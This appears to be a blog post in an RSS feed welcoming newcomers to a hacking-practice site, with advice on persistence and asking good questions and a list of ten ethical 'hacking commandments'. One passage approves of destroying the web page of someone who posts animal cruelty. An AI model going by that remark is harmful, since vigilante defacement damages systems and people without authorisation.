&lt;span style=&quot;font-size: small;&quot;&gt;Ok we all get frustrated, that is perfectly normal, it&#39;s perfectly  acceptable, most of all, it&#39;s perfectly understandable. If you solve a  problem immediately without thinking too much about it, it&#39;s too easy.  As a hacker, it&#39;s your responsibility to constantly challenge yourself  so you can excel in your craft. Stroustrup didn&#39;t make C++ in a day,  Unix certainly wasn&#39;t made in an 8-hour workday while the rest of the  team was playing foozball in the break room.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Let&#39;s say you&#39;re trying to work with HTML, JavaScript, PHP, SQL, etc.  The list of beautiful computer languages goes on. Take a look, and work  it like a puzzle. The beginning statement goes here, the arguement goes  here, the function goes here, the end-of-line statement goes here.  There! one line, then work the next, and the next, put them all  together, BAM! a source code, a program, whatever!&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;And for the love of all that is cyber and holy! Ask QUESTIONS! &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;My response and probably quite a few others would probably be along the  lines of: No, begone, you cancerous polyp upon the brain and lower  intestinal tract of the universe!&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Ok, maybe not so dramatic, but you catch my drift...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Good questions are like: I have no idea what a Javascript injection is,  can someone please tell me what it is, or give me an example?&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Ok! That&#39;s not bad, you were polite, and you asked a legitimate  question. Javascript injections are commonly used in hacking, so it&#39;s  not something to be ashamed of.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Persistence is always key and something we hackers pride ourselves on.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Also...one more thing I want to talk about, and this is on the edgy  side. This site and I agree on a lot of things, more so than anything though,  we agree on illegal action. We&#39;ve all watched Swordfish, Ghost In The  Shell (most of us, haha), War Games, and yes, even the classic: Hackers.  But I would very much like to say that, yes although hacking into  systems OF YOUR OWN is exhilarating, what is NOT (at least for ethical  people, and if you aren&#39;t one, I really don&#39;t know why you&#39;re here) is  cracking into things that you shouldn&#39;t be anywhere near in the first  place. I sound like a parent with the witchy-poo finger, I know, but  frankly, and here&#39;s the line you&#39;ve all heard before: It&#39;s for your own  good. Claiming to be elite just because you cracked the Pentagon isn&#39;t  something that your cellmate will care about while he&#39;s deciding how  best to shank you in the yard.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A word to the not-so-wise: True Hackers are not criminals. We are dubbed  criminals by people who despise that we have knowledge and  understanding of things they&#39;ll never have, and also because of the  idiots who claim to be hackers but are out to give us a bad name. In all  honesty, we don&#39;t do anything that&#39;s particularly harmful. Now, as an  example, and although I have never done it, I personally believe that if  someone was doing something like slaughtering puppies bear cubs, and  seals and posting pictures as a trophy on the internet, their page needs  to be utterly destroyed. But these scenarios are thankfully rare. Those  who do break into systems to harm people are the black-hats, the  crackers, the script kiddies, yes, sometimes the grey-hats, hence the  name. But that doesn&#39;t make them cool, that doesn&#39;t make them awesome,  it makes them criminals and idiots, childish in the extreme just because  they can make someone&#39;s life worse while partially filling the  senseless void in their own. My opinion? They were impressionable  immature idiots who never got hugged enough as kids.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Breaking into other people&#39;s systems who haven&#39;t done anything to you is  pathetic and doesn&#39;t make you worth anything but a prison sentence.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Breaking into another person&#39;s system who maybe forgot to give you back  the 10 bucks he owed you last week is childish, there is always a way  around these things, trust me.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So with that I leave you with my personal creed of hacking, a 10 Hacking  Commandments, if you will, but I digress.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;1. Thou shalt NOT break into a system that thoust doesn&#39;t belong&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;2. Thou shalt NOT steal passwords and codes unless specified in Amit-Spot&#39;  missions and missions ONLY (ex. Realistic Missions). Other than  that...keep your grubby paws off people&#39;s personal things, dammit&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;3. Thou shalt NOT harm another person with the knowledge that thou hast  been given&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;4. Thou shalt NOT cheat thy way through thy education&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;5. Thou shalt NOT speak like this when speaking to me&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;6. Thou SHALT be grateful to those who are willing to teach thee&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;7. Thou SHALT ask meaningful, useful questions&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;8. Thou SHALT use thy skills and ways for good&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;9. Thou SHALT STUDY, STUDY, STUDY&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;10. Thou SHALT speak to me and others normally, and not as Charlton  Heston or in some Shakespearian tongue because EchoDelta himself does  not particularly tolerate iambic pentameter for very long.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So there you have it, my personal commandments, my two cents etc etc.  This is just for those new to hacking and if I missed anything, ye  Masters of Olde, please feel free to correct me or post your opinions.  Happy Hacking all!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Regards, &lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;</description><link>http://amit-spot.blogspot.com/2010/11/welcome-to-newcomers.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8QsfmvsSJAcsLismv9GMHoUSVFsO_PjtutUODYhEIaw1Kpr_ow8Qm3B9kmBWgQKQESyxSzcFJ01fkjNKgixMekceSQvWxXQcxzcSapGQWpojpJYxGkiplWiapYx5Ju_kS8fdUDK9icA/s72-c/havcker.jpg" height="72" width="72"/><thr:total>0</thr:total></item></channel></rss>